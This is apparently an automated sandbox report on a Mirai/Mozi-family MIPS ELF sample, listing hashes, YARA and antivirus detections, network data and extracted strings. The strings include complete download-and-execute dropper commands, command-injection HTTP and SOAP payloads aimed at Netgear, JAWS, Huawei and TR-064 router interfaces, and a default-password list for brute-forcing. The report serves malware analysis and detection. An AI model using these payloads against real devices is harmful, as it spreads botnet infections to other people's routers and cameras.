Edit tour

Linux Analysis Report
i.elf

Overview

General Information

Sample name:i.elf
Analysis ID:1643749
MD5:b7d578514927172bb1a513eb38b13e4a
SHA1:abc7d16bad3795ee49850d7aac0b12ff0f7c8a79
SHA256:79cdfc21fe898a2551ed6ce9b405316b633700fad2057ea57dbb5184749ea094
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1643749
Start date and time:2025-03-20 04:07:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 17s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/0@2/0
Command:/tmp/i.elf
PID:5431
Exit Code:133
Exit Code Info:
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
  • system is lnxubuntu20
  • i.elf (PID: 5431, Parent: 5355, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/i.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    i.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      i.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        i.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          i.elfLinux_Packer_Patched_UPX_62e11c64unknownunknown
          • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          5431.1.00007ff5a8400000.00007ff5a8422000.r-x.sdmpLinux_Packer_Patched_UPX_62e11c64unknownunknown
          • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: i.elfAvira: detected
          Source: i.elfVirustotal: Detection: 65%Perma Link
          Source: i.elfReversingLabs: Detection: 55%
          Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
          Source: i.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.a;chmod
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.a;sh$
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;$
          Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
          Source: i.elfString found in binary or memory: http://%s:%d/bin.sh
          Source: i.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
          Source: i.elfString found in binary or memory: http://127.0.0.1
          Source: i.elfString found in binary or memory: http://127.0.0.1sendcmd
          Source: i.elfString found in binary or memory: http://HTTP/1.1
          Source: i.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
          Source: i.elfString found in binary or memory: http://ipinfo.io/ip
          Source: i.elfString found in binary or memory: http://purenetworks.com/HNAP1/
          Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
          Source: i.elfString found in binary or memory: http://upx.sf.net

          System Summary

          barindex
          Source: i.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
          Source: 5431.1.00007ff5a8400000.00007ff5a8422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
          Source: LOAD without section mappingsProgram segment: 0x400000
          Source: Initial sampleString containing 'busybox' found: busybox
          Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
          Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
          Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
          Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
          Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
          Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
          Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
          Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
          Source: Initial sampleString containing potential weak password found: admin
          Source: Initial sampleString containing potential weak password found: default
          Source: Initial sampleString containing potential weak password found: support
          Source: Initial sampleString containing potential weak password found: service
          Source: Initial sampleString containing potential weak password found: supervisor
          Source: Initial sampleString containing potential weak password found: guest
          Source: Initial sampleString containing potential weak password found: administrator
          Source: Initial sampleString containing potential weak password found: 123456
          Source: Initial sampleString containing potential weak password found: 54321
          Source: Initial sampleString containing potential weak password found: password
          Source: Initial sampleString containing potential weak password found: 12345
          Source: Initial sampleString containing potential weak password found: admin1234
          Source: Initial samplePotential command found: GET /c HTTP/1.0
          Source: Initial samplePotential command found: GET %s HTTP/1.1
          Source: Initial samplePotential command found: GET /c
          Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
          Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
          Source: Initial samplePotential command found: GET /%s HTTP/1.1
          Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
          Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
          Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
          Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
          Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
          Source: i.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
          Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
          Source: 5431.1.00007ff5a8400000.00007ff5a8422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
          Source: classification engineClassification label: mal100.troj.evad.linELF@0/0@2/0

          Data Obfuscation

          barindex
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
          Source: i.elfSubmission file: segment LOAD with 7.8156 entropy (max. 8.0)
          Source: /tmp/i.elf (PID: 5431)Queries kernel information via 'uname': Jump to behavior
          Source: i.elf, 5431.1.00007ffd4dbc8000.00007ffd4dbe9000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/i.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/i.elf
          Source: i.elf, 5431.1.000055a2b6c75000.000055a2b6cfc000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
          Source: i.elf, 5431.1.000055a2b6c75000.000055a2b6cfc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
          Source: i.elf, 5431.1.00007ffd4dbc8000.00007ffd4dbe9000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
          Source: i.elf, 5431.1.00007ffd4dbc8000.00007ffd4dbe9000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: i.elf, type: SAMPLE

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: i.elf, type: SAMPLE
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid Accounts1
          Command and Scripting Interpreter
          1
          Scripting
          Path Interception11
          Obfuscated Files or Information
          1
          Brute Force
          11
          Security Software Discovery
          Remote ServicesData from Local System1
          Non-Application Layer Protocol
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643749 Sample: i.elf Startdate: 20/03/2025 Architecture: LINUX Score: 100 8 daisy.ubuntu.com 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 2 other signatures 2->16 6 i.elf 2->6         started        signatures3 process4

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          i.elf65%VirustotalBrowse
          i.elf56%ReversingLabsLinux.Trojan.Dakkatoni
          i.elf100%AviraEXP/ELF.Agent.L.26
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          daisy.ubuntu.com
          162.213.35.25
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://%s:%d/bin.sh;chmodi.elffalse
              high
              http://ipinfo.io/ipi.elffalse
                high
                http://%s:%d/Mozi.a;chmodi.elffalse
                  high
                  http://%s:%d/Mozi.m;/tmp/Mozi.mi.elffalse
                    high
                    http://schemas.xmlsoap.org/soap/encoding/i.elffalse
                      high
                      http://%s:%d/bin.shi.elffalse
                        high
                        http://purenetworks.com/HNAP1/i.elffalse
                          high
                          http://%s:%d/Mozi.m;i.elffalse
                            high
                            http://%s:%d/Mozi.m;$i.elffalse
                              high
                              http://schemas.xmlsoap.org/soap/envelope/i.elffalse
                                high
                                http://upx.sf.neti.elffalse
                                  high
                                  http://HTTP/1.1i.elffalse
                                    high
                                    http://%s:%d/Mozi.a;sh$i.elffalse
                                      high
                                      http://127.0.0.1i.elffalse
                                        high
                                        http://baidu.com/%s/%s/%d/%s/%s/%s/%s)i.elffalse
                                          high
                                          http://schemas.xmlsoap.org/soap/envelope//i.elffalse
                                            high
                                            http://%s:%d/Mozi.mi.elffalse
                                              high
                                              http://127.0.0.1sendcmdi.elffalse
                                                high
                                                No contacted IP infos
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                daisy.ubuntu.comjkse.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                jkse.arm7.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.24
                                                jkse.x86.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                bin.sh.elfGet hashmaliciousMiraiBrowse
                                                • 162.213.35.24
                                                jkse.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 162.213.35.24
                                                jkse.arm.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                jkse.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                jkse.mips.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                jkse.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.25
                                                jkse.x86.elfGet hashmaliciousUnknownBrowse
                                                • 162.213.35.24
                                                No context
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                Entropy (8bit):5.56623820955458
                                                TrID:
                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                File name:i.elf
                                                File size:307'960 bytes
                                                MD5:b7d578514927172bb1a513eb38b13e4a
                                                SHA1:abc7d16bad3795ee49850d7aac0b12ff0f7c8a79
                                                SHA256:79cdfc21fe898a2551ed6ce9b405316b633700fad2057ea57dbb5184749ea094
                                                SHA512:0affd0aa9617717e36893a3f8ccbe0eed5355dd5dac1f85e43ab9b2e297ffac9d0d1654f02f9f7bc37beda84ac652151367d1a0ff96a213c34f0a133bdced912
                                                SSDEEP:3072:phNlHuBafLeBtfCzpta8xlBIOdVo3/4sxLJ10xio0Pa5POdOQ33Q:p3lOYoaja8xzx/0wsxzSiiPqOJ
                                                TLSH:3A64F1CAEF11BC3AE984067539AB074DB3B49B96C3C7F080F294C55E38AD685AB611D4
                                                File Content Preview:.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../..........*.*UPX!.X.....................^....|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, big endian
                                                Version:1 (current)
                                                Machine:MIPS R3000
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x4206a8
                                                Flags:0x1007
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:2
                                                Section Header Offset:0
                                                Section Header Size:40
                                                Number of Section Headers:0
                                                Header String Table Index:0
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x4000000x4000000x210f20x210f27.81560x5R E0x10000
                                                LOAD0x00x4300000x4300000x00x92fd80.00000x6RW 0x10000

                                                Download Network PCAP: filteredfull

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 20, 2025 04:07:55.377378941 CET6098753192.168.2.131.1.1.1
                                                Mar 20, 2025 04:07:55.377473116 CET5653053192.168.2.131.1.1.1
                                                Mar 20, 2025 04:07:55.471276045 CET53609871.1.1.1192.168.2.13
                                                Mar 20, 2025 04:07:55.473284006 CET53565301.1.1.1192.168.2.13
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Mar 20, 2025 04:07:55.377378941 CET192.168.2.131.1.1.10x6777Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                Mar 20, 2025 04:07:55.377473116 CET192.168.2.131.1.1.10xb8a3Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Mar 20, 2025 04:07:55.471276045 CET1.1.1.1192.168.2.130x6777No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                Mar 20, 2025 04:07:55.471276045 CET1.1.1.1192.168.2.130x6777No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                System Behavior

                                                Start time (UTC):03:07:53
                                                Start date (UTC):20/03/2025
                                                Path:/tmp/i.elf
                                                Arguments:/tmp/i.elf
                                                File size:5777432 bytes
                                                MD5 hash:0083f1f0e77be34ad27f849842bbb00c